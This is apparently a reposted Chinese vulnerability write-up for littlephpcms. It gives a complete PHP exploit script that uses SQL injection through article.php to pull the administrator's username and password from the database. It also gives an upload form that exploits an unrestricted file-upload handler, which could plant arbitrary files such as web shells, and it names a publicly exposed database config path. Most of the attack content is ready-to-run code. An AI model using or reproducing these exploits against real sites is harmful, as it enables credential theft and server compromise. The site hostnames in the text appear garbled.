简要描述:
// pageArt.php //..略 $column = $_POST["column"]; $rownum = $_POST["rownum"]; $sql = " select id,title,addtime from lpc_article where column_id=".$column; //..略 其他类似文件..略 Exp:
<?php error_reporting(E_ERROR); print_r(' +---------------------------------------------------------------------+ Sql injection Vul Exploit
Exp :黑小子 cfking Home: [url]HdhCmsTest2cto测试数据 [/url] [url]HdhCmsTestwebvul测试数据[/url] 2011.09.20 +---------------------------------------------------------------------+ ');
if ($argc < 2) { print_r(' Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' [url]HdhCmsTest2cto测试数据 [/url] test '); die(); } ob_start(); $host = $argv[1]; $path= $argv[2]; $sock = fsockopen($host, 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)\n"); fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n"); fwrite($sock, "Host: $host\r\n"); fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n"); fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n"); fwrite($sock, "Connection: keep-alive\r\n\r\n"); $headers = ""; while ($str = trim(fgets($sock, 1024))) $headers .= "$str\n"; $body = ""; while (!feof($sock)) $body .= fgets($sock, 1024); fclose($sock); ob_end_flush(); //print_r($body); if (strpos($body, 'cfkings90sec') !== false) { preg_match('/cfkings90sec~(.*?)~1/', $body, $arr); $result=explode("-",$arr[1]); print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
} else{ print_r("Exploit Failed! \n"); }
文件上传:
漏洞文件 :admin/column/upload.php
admin/article/upload.php $upload_dir = 'uploads/'; $file_path = $upload_dir . $_FILES['myfile']['name']; $MAX_SIZE = 20000000; echo $_POST['buttoninfo']; ...... if($_FILES['myfile']['size']>$MAX_SIZE) echo "上传的文件大小超过了规定大小"; if($_FILES['myfile']['size'] == 0) echo "请选择上传的文件"; if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path)) echo "复制文件失败,请重新上传";
两个文件都没任何限制!
Exp:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <form enctype="multipart/form-data" action=" http://HdhCmsTest2cto测试数据 /admin/column/upload.php" method="post"> <p>上传后网站跟目录/uploads/你上传的文件名<p> <input type="file" name="myfile" size="20"> <input type="submit" value="Upload"> </form>
信息泄漏:
10 http://HdhCmsTest2cto测试数据 /admin/lib/db/config.xml
查看更多关于littlephpcms 多处注入 上传 信息泄漏等漏洞及修复的详细内容...